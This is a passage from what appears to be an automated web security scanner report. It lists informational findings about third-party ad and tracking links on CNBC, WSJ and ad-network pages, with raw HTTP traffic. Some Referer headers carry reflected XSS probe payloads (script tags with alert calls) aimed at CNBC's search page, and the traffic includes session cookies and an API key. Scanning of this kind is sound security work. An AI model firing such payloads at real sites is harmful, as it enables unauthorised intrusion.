p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14451095&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14451095&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
pin_78l5g3r6tca4y1dvh6pizili5_ID', 'http://reviews.homedepot.com/1999s/4623471/profilesnapshot.djs?format=embeddedhtml',
'ProfileSnapshotFrame'
) &&
BVAnalyticsTracker.fireActionEvent(this);
"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/more_reviews_icon.gif" alt="" /></a>
...[SNIP]...
<div class="BVDI_PSSnapshotLoading"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/profileSnapshotLoading.gif" alt="Please wait while more information about Kccabletech is loaded." title="Please wait while more information about Kccabletech is loaded."/></div>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14194185&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14194185&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVDI_FBImage"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/filteringBusy.gif" alt="Filtering is in progress. Please wait until it completes." title="Filtering is in progress. Please wait until it completes."/></div>
...[SNIP]...

15.74. http://rs.gwallet.com/r1/pixel/x113 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x113

Issue detail

The page was loaded from a URL containing a query string:

http://rs.gwallet.com/r1/pixel/x113?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=17&admeld_callback=http://tag.admeld.com/pixel

The response contains the following links to other domains:

http://pb.tynt.com/mapping_pixel?from=radium&r1s=Bs25AtAC-6B1rEV5402loG5MaTQfJQkMnBcmQ6G5Fk8
http://tag.admeld.com/pixel?admeld_dataprovider_id=17&_seg=&external_user_id=0&expiration=7day

Request

Response

15.75. http://search.cnbc.com/main.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The page was loaded from a URL containing a query string:

http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://ads1.msn.com/library/dap.js?rti=200914
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js
http://www.nbcuniversalstore.com/?v=cnbc
http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions

Request

POST /main.do?target=all&keywords=xss&categories=exclude HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
Content-Length: 18
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USERFONTSIZE=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; __qca=P0-1930011807-1308223509319; s_nr=1308223605121

searchboxinput=xss

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:27:24 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 71028
X-Aicache-OS: 64.210.193.97:80
Connection: Keep-Alive
Keep-Alive: max=20

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/id/29755670">
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js?rti=200914"></script>
...[SNIP]...

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
<div style="height:1px; line-height:1px;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
<param name="allowScriptAccess" value="always">
...[SNIP]...
<div pcid="0" style="padding-bottom:px;"><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<div class="cnbc_submenutitle"><a style="color: rgb(255, 255, 255); text-decoration: none; margin-top:

3px; margin-left: -5px;" class="cnbc_submenutitle" onMouseOver="this.style.color='#FFDF0A'"

onMouseOut="this.style.color='#FFFFFF'"

href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle"><a style="color: rgb(255, 255, 255); text-decoration: none; margin-top:

3px; margin-left: -5px;" class="cnbc_submenutitle" onMouseOver="this.style.color='#FFDF0A'"

onMouseOut="this.style.color='#FFFFFF'"

href="http://www.nbcuniversalstore.com/?v=cnbc">Merchandise</a>
...[SNIP]...

<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

15.76. https://services.wsj.com/Gryphon/jsp/retentionController.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.wsj.com
Path:	/Gryphon/jsp/retentionController.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=160

The response contains the following link to another domain:

https://ad.doubleclick.net/activity;src=1256509;type=fromw061;cat=fromw640;ord=1;num=1?

Request

GET /Gryphon/jsp/retentionController.jsp?page=160 HTTP/1.1
Host: services.wsj.com
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow;u=%5E%5ElDlIlPlQlA;;msrc=WSJ_hp_mostpop_read;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=wsjfreezone;tile=1;sz=377x50;ord=1161116111611161;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; s_cc=true; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2235%22%2C%22high%22%3A%5B%2281%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DThu%2C%2016%20Jun%202011%2011%3A42%3A22%20GMT%7C%7CweatherCode%3D10005; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_U.S.%252520Home_0_0_WH_0001_public%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702303714704576384051388321740.html%25253Fmod%25253DWSJ_hp_mostpop_re%2526ot%253DA; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:25 GMT
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix) DAV/2
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Subscribe
...[SNIP]...
<NOSCRIPT><IMG SRC="https://ad.doubleclick.net/activity;src=1256509;type=fromw061;cat=fromw640;ord=1;num=1?" WIDTH=1 HEIGHT=1 BORDER=0></NOSCRIPT>
...[SNIP]...

15.77. https://soundcloud.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login

Issue detail

The page was loaded from a URL containing a query string:

https://soundcloud.com/login?ref=top

The response contains the following link to another domain:

https://pixel.quantserve.com/pixel/p-47_zcqmJsLHXQ.gif

Request

Response

15.78. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225268837&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F

The response contains the following links to other domains:

http://am.nexac.com/match?user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=5
http://api.bizographics.com/v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4
http://tags.bluekai.com/site/3561?id=d96a784e-8901-47de-9dd1-4f91acb31514&redir=http%3A%2F%2Ftag.admeld.com%2Fpixel%3Fadmeld_dataprovider_id%3D21%26external_user_id%3D%24BK_UUID%26_m%3D1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=21&admeld_callback=http://tag.admeld.com/pixel

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308225268837&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2073
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:10:23 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<img style="display:none" width="1" height="1" src="http://am.nexac.com/match?user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=5"/>

<img style="display:none" width="1" height="1" src="http://api.bizographics.com/v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4"/>

<img width="0" height="0" src="http://tags.bluekai.com/site/3561?id=d96a784e-8901-47de-9dd1-4f91acb31514&redir=http%3A%2F%2Ftag.admeld.com%2Fpixel%3Fadmeld_dataprovider_id%3D21%26external_user_id%3D%24BK_UUID%26_m%3D1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=21&admeld_callback=http://tag.admeld.com/pixel"/>

</div>
...[SNIP]...

15.79. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4

The response contains the following links to other domains:

http://adadvisor.net/adscores/g.pixel?sid=9223635428&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=1&admeld_callback=http://tag.admeld.com/pixel
http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match
http://sync.mathtag.com/sync?mt_exid=2&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1962
Content-Type: text/html
Date: Thu, 16 Jun 2011 11:53:32 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<img width="0" height="0" src="http://sync.mathtag.com/sync?mt_exid=2&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<img width="0" height="0" src="http://adadvisor.net/adscores/g.pixel?sid=9223635428&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=1&admeld_callback=http://tag.admeld.com/pixel"/>

</div>
...[SNIP]...

15.80. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860

The response contains the following links to other domains:

http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel
http://pixel.quantserve.com/seg/r;a=p-61YFdB4e9hBRs;redirect=http://tag.admeld.com/pixel?admeld_dataprovider_id=15&_seg=!qcsegs&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=15&admeld_callback=http://tag.admeld.com/pixel
http://rs.gwallet.com/r1/pixel/x113?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=17&admeld_callback=http://tag.admeld.com/pixel

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2152
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:25:25 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<img width="0" height="0" src="http://pixel.quantserve.com/seg/r;a=p-61YFdB4e9hBRs;redirect=http://tag.admeld.com/pixel?admeld_dataprovider_id=15&_seg=!qcsegs&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=15&admeld_callback=http://tag.admeld.com/pixel"/>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://rs.gwallet.com/r1/pixel/x113?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=17&admeld_callback=http://tag.admeld.com/pixel"></iframe>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel"></iframe>
...[SNIP]...

15.81. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308305586056&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue

The response contains the following links to other domains:

http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel
http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match
http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308305586056&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2108
Content-Type: text/html
Date: Fri, 17 Jun 2011 10:13:06 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel"></script>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>
...[SNIP]...

15.82. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3

The response contains the following links to other domains:

http://pbid.pro-market.net/engine?site=124915;size=1x1;mimetype=img&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=12&admeld_callback=http://tag.admeld.com/pixel
http://pixel.quantserve.com/seg/r;a=p-61YFdB4e9hBRs;redirect=http://tag.admeld.com/pixel?admeld_dataprovider_id=15&_seg=!qcsegs&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=15&admeld_callback=http://tag.admeld.com/pixel
http://www.wtp101.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2099
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:04:23 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://pbid.pro-market.net/engine?site=124915;size=1x1;mimetype=img&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=12&admeld_callback=http://tag.admeld.com/pixel"></iframe>

<img width="0" height="0" src="http://pixel.quantserve.com/seg/r;a=p-61YFdB4e9hBRs;redirect=http://tag.admeld.com/pixel?admeld_dataprovider_id=15&_seg=!qcsegs&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=15&admeld_callback=http://tag.admeld.com/pixel"/>

<img width="0" height="0" src="http://www.wtp101.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

</div>
...[SNIP]...

15.83. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

